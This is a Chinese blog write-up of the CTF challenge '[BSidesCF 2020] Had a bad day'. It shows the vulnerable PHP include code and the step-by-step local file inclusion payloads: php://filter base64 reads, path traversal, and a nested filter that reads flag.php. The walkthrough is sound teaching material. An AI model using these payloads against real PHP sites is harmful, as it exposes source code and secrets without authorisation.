buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)

最新推荐文章于 2024-04-26 23:16:19 发布

小宇特详解

最新推荐文章于 2024-04-26 23:16:19 发布

阅读量4.4k

点赞数 3

分类专栏： buuctf 文章标签： php web安全安全

本文链接：https://blog.csdn.net/xhy18634297976/article/details/122959626

版权

buuctf 专栏收录该内容

23 篇文章 4 订阅

订阅专栏

buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)

先看一下题目

这里上面有注入点，这里怀疑是SQL注入

先尝试读取一下index.php

这里使用php伪协议

payload：

php://filter:/convert.base64-encode/resource=index.php

存在文件包含漏洞，但是这里报错了，分析之后是无法打开流：操作失败

这里去除php后缀

payload

php://filter/convert.base64-encode/resource=index

解码之后找到index.php

<?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

传入的category参数必须有woofers,meowers,index才行

这里构造payload来包含flag.php

/index.php?category=woofers/../flag

那如何去获取flag.php的内容呢

这里使用的知识点是php://filter伪协议套协议

payload:

/index.php?category=php://filter/convert.base64-encode/index/resource=flag

base64解码

小宇特详解

关注

3
点赞
踩
6

收藏

觉得还不错? 一键收藏
打赏
2
评论
buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)

buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)先看一下题目这里上面有注入点，这里怀疑是SQL注入先尝试读取一下index.php这里使用php伪协议payload：php://filter:/convert.base64-encode/resource=index.php存在文件包含漏洞，但是这里报错了，分析之后是无法打开流：操作失败这里去除php后缀payloadphp://filter/convert.base64-encode/reso
复制链接

扫一扫